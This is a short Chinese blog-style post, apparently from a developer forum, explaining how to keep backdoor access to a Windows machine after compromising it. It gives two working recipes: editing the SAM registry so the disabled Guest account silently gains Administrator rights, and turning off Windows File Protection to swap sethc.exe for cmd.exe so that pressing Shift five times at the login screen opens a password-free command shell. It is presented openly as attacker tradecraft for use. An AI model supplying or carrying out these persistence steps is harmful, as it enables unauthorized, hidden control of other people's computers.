当我们取得Windows系统的登录权限后,下一步考虑的无疑是登录后门的设置问题,如何设置隐藏的登录后门,本文提供两种思路以供借鉴。
一、建立隐藏的管理员账号登录:
思路:通过这种方式,攻击者可以设置后门,将账号管理中显示为已禁用的用户如guest授予管理员权限,并随时登录。
步骤:
1 、打开regedit:打开hkey_Local_Mashion,单击SAM,点击右键,点权限,将“完全控制”权限赋给管理员,退出后重新打开regedit,否则SAM下的项目无法打开;
2 、打开SAM——SAM——domians——ACCOUNT——users,将1F4(administrator)下的F键值全选copy到1F5(guest)下的F键值;
3、现在系统的计算机管理中guest账户仍为禁用,但使用guest账户登录后即可以拥有administrator的所有权限。
二、windows不需要密码登录:
思路:使用windows系统登录时的实用程序,如粘滞键:sethc.exe,可以考虑将sethc.exe替换为cmd.exe。
步骤:
1、关闭windows文件保护(WFP):打开regedit,打开HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon,将“SFCDisable”的键值修改为“FFFFFF9D”,如果需要重新启用该功能,重新设置为“0”就可以了;
2、将sethc.exe改名: 进入c:/windows/system32/dllcache,
1)运行attrib –s –r –h
2)ren sethc.exe ~.*
3、更换为cmd.exe:进入 c:/windows/system32
1)运行 attrib –s –r –h
2) copy cmd.exe sethc.exe
4、 此时在登录页面,按5次shift键,就可以调出cmd.exe,然后输入explorer.exe既可进入桌面。
318
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
